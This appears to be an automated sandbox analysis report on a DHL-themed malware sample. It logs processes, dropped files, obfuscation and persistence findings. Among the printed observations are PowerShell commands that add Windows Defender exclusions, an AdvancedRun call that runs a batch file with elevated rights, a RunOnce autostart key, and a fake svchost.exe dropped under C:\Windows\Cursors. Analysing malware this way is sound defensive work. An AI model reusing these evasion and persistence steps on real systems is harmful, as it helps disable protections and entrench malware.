Source: unknown	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5308 -ip 5308
Source: unknown	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 2256
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
Source: unknown	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' -Force	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process created: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DHL_document1102202068090891.exe' -Force	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /c timeout 1	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe	Process created: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe' /SpecialRun 4101d8 1864	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 1
Source: C:\Windows\explorer.exe	Process created: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe'
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5308 -ip 5308
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 2256
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F324E4F9-8496-40b2-A1FF-9617C1C9AFFE}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: DHL_document1102202068090891.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: DHL_document1102202068090891.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: C:\Users\user\Desktop\DHL_document1102202068090891.PDB source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.518632539.0000000001601000.00000004.00000020.sdmp, svchost.exe, 00000011.00000002.519615274.00000000012F7000.00000004.00000001.sdmp
Source:	Binary string: .pdb8 source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp
Source:	Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.544063484.000000000460D000.00000004.00000001.sdmp, AdvancedRun.exe, 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000000E.00000002.330323781.000000000040C000.00000002.00020000.sdmp, svchost.exe, 00000011.00000002.544010014.0000000004149000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb2 source: svchost.exe, 00000011.00000002.516851246.0000000001274000.00000004.00000001.sdmp
Source:	Binary string: DHL_document1102202068090891.PDBp source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.553312759.0000000006F98000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.518675957.00000000012BE000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\DHL_document1102202068090891.PDB source: DHL_document1102202068090891.exe, 00000000.00000002.518266676.00000000015E7000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: svchost.exe, 00000011.00000002.518543220.00000000012B1000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb: source: DHL_document1102202068090891.exe, 00000000.00000002.553253133.0000000006F80000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.518632539.0000000001601000.00000004.00000020.sdmp
Source:	Binary string: S:AI(RA;IOOICI;;;;WD;("IMAGELOAD",TU,0x0,0x01))\??\C:\Windows\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 00000011.00000002.516851246.0000000001274000.00000004.00000001.sdmp
Source:	Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.518564099.00000000015F4000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.553253133.0000000006F80000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.519615274.00000000012F7000.00000004.00000001.sdmp
Source:	Binary string: IL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.518833808.0000000001610000.00000004.00000020.sdmp
Source:	Binary string: 00240000048000009400000006020000002400005253413C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: svchost.exe, 00000011.00000002.519520008.00000000012F3000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.VisualBasic.pdb1l source: DHL_document1102202068090891.exe, 00000000.00000002.553253133.0000000006F80000.00000004.00000001.sdmp
Source:	Binary string: mscorlib.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.518564099.00000000015F4000.00000004.00000020.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.517829728.00000000015D9000.00000004.00000020.sdmp
Source:	Binary string: kc.pdbis/P} source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\user\Desktop\DHL_document1102202068090891.PDB/ source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp
Source:	Binary string: iLC:\Windows\Microsoft.VisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp, svchost.exe, 00000011.00000002.505795021.0000000000B98000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb/C:/Windows/System32/cmd.exe source: svchost.exe, 00000011.00000002.519202298.00000000012DF000.00000004.00000001.sdmp
Source:	Binary string: iVisualBasic.pdb source: DHL_document1102202068090891.exe, 00000000.00000002.506062592.00000000012F8000.00000004.00000001.sdmp
Source:	Binary string: 0024000004800000940000000602000000240000525341310004000001000100B5FC90E7027F67871E773A8FDE8938C81DD402Bf:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: svchost.exe, 00000011.00000002.519202298.00000000012DF000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: svchost.exe, 00000011.00000002.556090022.000000000960D000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdbC:\Users\user\Documentsr source: svchost.exe, 00000011.00000002.515773658.0000000001255000.00000004.00000001.sdmp
Source:	Binary string: iVisualBasic.pdbt source: svchost.exe, 00000011.00000002.505795021.0000000000B98000.00000004.00000001.sdmp
Source:	Binary string: svchost.PDB source: svchost.exe, 00000011.00000002.505795021.0000000000B98000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.PDB source: svchost.exe, 00000011.00000002.556090022.000000000960D000.00000004.00000001.sdmp
Source:	Binary string: Windows.Foundation.Collections.ValueSet\??\C:\Windows\symbols\dll\mscorlib.pdb source: svchost.exe, 00000011.00000002.519615274.00000000012F7000.00000004.00000001.sdmp
Source:	Binary string: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.PDB source: svchost.exe, 00000011.00000002.505795021.0000000000B98000.00000004.00000001.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb} source: DHL_document1102202068090891.exe, 00000000.00000002.553312759.0000000006F98000.00000004.00000001.sdmp

Data Obfuscation:

.NET source code contains potential unpacker

Show sources

Source: 29.2.CasPol.exe.400000.0.unpack, u0023u003dqjIje6jGWLd2EOkfZXKqBbgu003du003d.cs	.Net Code: #=q_FL69pQf17BUSAFbWYu1SStMAbdu$R1GJ8VY8UL5_EA= System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 29.2.CasPol.exe.400000.0.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs	.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])

Binary contains a suspicious time stamp

Show sources

Source: initial sample

Static PE information: 0x85456217 [Wed Nov 7 16:00:23 2040 UTC]

Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe

Code function: 12_2_0040289F LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

12_2_0040289F

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Code function: 0_2_069D48D9 push es; retf	0_2_069D48EC
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Code function: 0_2_069D48FD push es; retf	0_2_069D4900
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Code function: 0_2_069D48F9 push es; retf	0_2_069D48FC
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Code function: 0_2_069D48F5 push es; retf	0_2_069D48F8
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Code function: 0_2_069D48F1 push es; retf	0_2_069D48F4
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Code function: 0_2_069D48ED push es; retf	0_2_069D48F0
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Code function: 0_2_069D4911 push es; retf	0_2_069D4914
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Code function: 0_2_069D490D push es; retf	0_2_069D4910
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Code function: 0_2_069D4909 push es; retf	0_2_069D490C
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Code function: 0_2_069D4905 push es; retf	0_2_069D4908
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Code function: 0_2_069D4901 push es; retf	0_2_069D4904
Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe	Code function: 12_2_0040B550 push eax; ret	12_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe	Code function: 12_2_0040B550 push eax; ret	12_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe	Code function: 12_2_0040B50D push ecx; ret	12_2_0040B51D
Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe	Code function: 14_2_0040B550 push eax; ret	14_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe	Code function: 14_2_0040B550 push eax; ret	14_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe	Code function: 14_2_0040B50D push ecx; ret	14_2_0040B51D
Source: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe	Code function: 28_2_05749317 push F000005Eh; retf	28_2_057492F1

Source: 29.2.CasPol.exe.400000.0.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.cs	High entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
Source: 29.2.CasPol.exe.400000.0.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.cs	High entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='

Persistence and Installation Behavior:

Drops PE files with benign system names

Show sources

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe

File created: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe

Jump to dropped file

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Windows\explorer.exe

Executable created and started: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	File created: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe			Jump to dropped file
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	File created: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe			Jump to dropped file

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe

File created: C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe

Jump to dropped file

Boot Survival:

Creates an autostart registry key pointing to binary in C:\Windows

Show sources

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe

Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce LEawmrprcqlukaA

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe

Code function: 12_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,

12_2_00401306

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce LEawmrprcqlukaA	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce LEawmrprcqlukaA	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce LEawmrprcqlukaA	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce LEawmrprcqlukaA	Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Source: C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe

Code function: 12_2_00408E31 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

12_2_00408E31

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\DHL_document1102202068090891.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
